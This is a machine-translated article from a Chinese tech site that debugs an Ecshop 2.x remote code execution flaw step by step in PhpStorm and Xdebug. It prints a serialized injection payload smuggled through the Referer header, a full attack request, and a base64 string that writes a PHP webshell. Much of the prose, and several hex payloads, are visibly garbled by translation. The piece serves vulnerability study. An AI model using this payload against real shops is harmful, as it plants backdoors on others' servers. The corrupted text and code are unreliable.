Shulou(Shulou.com)05/31 Report--

How to carry out Ecshop2.x code execution vulnerability dynamic debugging analysis, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

First, background introduction

Known as the largest open source online store system in China, it can be written directly to webshell remotely.

This article will analyze every detail of the vulnerability through dynamic analysis. You can see the principle of the vulnerability, which is very detailed. This article focuses on the skills of dynamic analysis and audit and how to debug the vulnerability. The vulnerability itself is also a loophole worth learning. To construct this attack chain requires a deep understanding of every detail.

Second, the construction of dynamic debugging environment

Download and install phpstudy and phpstorm by yourself

First determine the php version

Then modify the configuration file

Modify the php.ini as follows

[XDebug]

Xdebug.profiler_append = 0xdebug.profiler_enable = 1xdebug.profiler_enable_trigger = 0xdebug.profiler_output_dir = "C:\ phpStudy\ tmp\ xdebug" xdebug.trace_output_dir = "C:\ phpStudy\ tmp\ xdebug" xdebug.profiler_output_name = "cache.out.%t-%s" xdebug.remote_enable = 1xdebug.remote_handler = "dbgp" xdebug.remote_host = "127.0.0.1" zend_extension= "C:\ phpStudy\ php53\ ext\ xdebug.dll" xdebug.remote_port=9000xdebug.idekey= PHPSTROM

Set the php version, be sure to match it.

The following picture is not moved by default.

The following modifications to the key and port are as follows

Configure the root debugging environment here

Just leave a Chrome browser here

Chrome browser to install plug-ins JetBrains IDE Support download and install no need to modify the configuration, so it is basically OK.

Third, dynamic debugging and analysis of vulnerabilities

The following dynamic analysis, the advantage of dynamic analysis is that the vulnerability analysis is clearer.

Breakpoint here we have broken the starting point of the vulnerability to facilitate the analysis of every detail, and then click debug

Then the browser will open

Then click to log in, which will trigger the breakpoint and you can see that it has stopped at the breakpoint.

Here are some keyboard shortcuts to use:

F7 will follow the function.

F8 step out is a line of walking, do not enter the function, some loops or do not want to see the function directly f8

After entering the function, if you want to jump out, use shift+f8.

Ctrl+art plus click on the function you want to see will enter

Alt + f7 will search for who called this function or variable

These are the things I often use. After mastering these skills, I can debug them.

Here HTTP_REFFER can be controlled to assign to $back_act

Let's use burp to grab the package and test the vulnerability, and analyze payload first.

| 554fcae493e564ee0dc75bdf2ebf94caads | 554fcae493e564ee0dc75bdf2ebf94caads 2: {Slav 3: "num"; slug 280: "* / union select 1Magic 0x272f2aPower3x272f2aPower3x7b24617364275d3b617373657274286262636345f6465636f646275a6d6c735a56397764585266592397564475634768774a7a45634768774a79776e50443977614841675a585a686243676b583145532624d544d7da4e3130704f79412f6970293293b2f2f77877710e -" sVER2: "id" / *};

The string of 554fcae493e564ee0dc75bdf2ebf94caads can be divided into two parts, one is 554fcae493e564ee0dc75bdf2ebf94ca, the other is that ads,ads controls the flow of functions into insert_ads functions, and the one in front of 554fcae493e564ee0dc75bdf2ebf94ca is a hash, which will be judged and removed after judgment. Without it, it cannot enter the attack chain, and the dynamic analysis process will be introduced later.

The rest of the code is unraveled like this.

{$asd']; assert (base64_decode ('file_put_contents (' 1.php'); / /} xxx

Send a package

GET / upload/user.php?act=login HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Cookie: ECS_ID=3e839434a217e8c1f2a931f70086935a43141a6d; ECS [times _ times] = 1Referer: 554fcae493e564ee0dc75bdf2ebf94caads | aV2: {Sv3: "num" SVERUR 280: "* / union select 1Power0x272f2aRecrow3Reporter 4Revery5275d3b61737364275d3b61737372742862636536345f6465636f646528275a6d6c735a563977645659239756447567564484a7a4575634768774a79776e5044776e446148475a585a686243676b585553152624d544d7a4e3130704f794f79704f797027293b2f2f7d788710e -"; closeUpgrade-Insecure-Requests: "id"; s2f7f7d78810x "; Connection: 1

You can see the success of writing to webshell

Then we continue to debug, we first walk all the way f8 to here, and then f7 enter to have a look.

The key point here is insert_mod, which is called dynamically, because we cannot grab the package and send payload test, so we need to modify the parameters to make the process execute according to the payload attack chain, and the insert_ads needs to be executed in the attack chain. Here is a hash judgment

As you can see below, there is this hash, so there is no control here, and then continue the process.

The hash will be removed in the following picture and the rest of the 1Magne3, 5, and 7 in $k setvalue can be controlled, so here we change its value to our payload in 1, right-click on setvalue

Re-copy the payload, right-click setValue, here direct copy will report an error, or a little bit to modify it, and then double quotation marks to escape

Ads | ads 2: {Slav 3:\ "num\"; slav 280:\ "* / union select 1Magic 0x272f2aMagic 3, 4, 5, 5, 6, 6, 7, 7, 8, 8, 0, b24617364275d3b61737362742862636345f6465636f6465285a6d6c735a5639776458526659239756447567564484d6f4a77575634768774a79776e5044776148416755a585686243676b583142503152624d544da4130704f4130704f4f79412506370293b2f2f77877888810 -";\ sRent2 ";

Continue f7 into insert_mod, and then find that the insert_ads function has been controlled, but when payload is deserialized, $para is false, indicating that there is something wrong with our payload. Click debug to start over.

Change the position and modify it before the deserialization function. In the following picture, you can see that $para has a value. It is our payload.

Go on to insert_ads, all the way to f8, and let our payload insert the variable num.

And ended up stitching it like this.

Keep going down, all the way to here on f8

Then f7 enters and takes a look, substituting payload into the _ eval code execution function, where payload will also be processed by fetch_str, and f7 will enter and have a look.

F8 came here, before the source has not changed, after the preg_replace will deal with {

Payload becomes $asd';] assertxxx is substituted into select

This select function can't follow in, so we can only analyze it statically. We can find ctrl+shift+f like this.

Enter get_val,substr in select and remove $

Payload becomes: asd';] assertXXX

Entered the make_var.

Finally got the splicing.

Eventually payload becomes

$this- > _ var ['asd']; assert (base64_decode (' ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp')); / /']

And finally came to eval.

One more walk here and the shell will be written in.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.